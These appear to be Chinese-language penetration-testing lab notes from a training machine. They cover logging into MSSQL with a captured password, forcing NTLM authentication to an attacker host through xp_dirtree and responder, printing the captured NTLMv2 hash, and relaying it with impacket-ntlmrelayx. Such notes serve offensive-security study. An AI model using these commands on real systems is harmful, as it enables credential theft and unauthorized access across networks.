发现用获取的凭证:will/fdsfssdfDFG4,可以登录151
的MSSQL
:
proxychains4 impacket-mssqlclient <will:[email protected]> -port 1433
-windows-auth
用**-windows-auth**进行认证,不然登录不了:
查找linked server
:
SQL> select srvname from sysservers;
查看登录的用户名:
SQL> select system_user;
显然,当前登录的用户不是sysadmin
权限。参考P580
的攻击方式。
responder -I tun0
SQL> EXECUTE('master..xp_dirtree "\\\\192.168.49.64\\a"');
responder
那个终端显示如下:
[SMB] NTLMv2-SSP Client : ::ffff:192.168.64.159
[SMB] NTLMv2-SSP Username : TRICKY\\sqlsvc
[SMB] NTLMv2-SSP Hash : sqlsvc::TRICKY:80e42d2692c2d0d7:E67868298AC29BC3733EBF15050EAFFB:010100000000000080B0C577AE9FD8018CCD3A5CAE97F098000000000200080037004D003900590001001E00570049004E002D00390058004B0054004F00490055005100580047004D0004003400570049004E002D00390058004B0054004F00490055005100580047004D002E0037004D00390059002E004C004F00430041004C000300140037004D00390059002E004C004F00430041004C000500140037004D00390059002E004C004F00430041004C000700080080B0C577AE9FD80106000400020000000800300030000000000000000000000000300000EAB56095DB82EF7C3EC835B05F4C8C0C1D6741115F96F86D548C46B4B2DEC2650A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E00340039002E00360034000000000000000000
密码似乎破解不出来,换一种意思。参考P584
。
proxychains4 impacket-ntlmrelayx --no-http-server -smb2support -t smb://172.16.64.152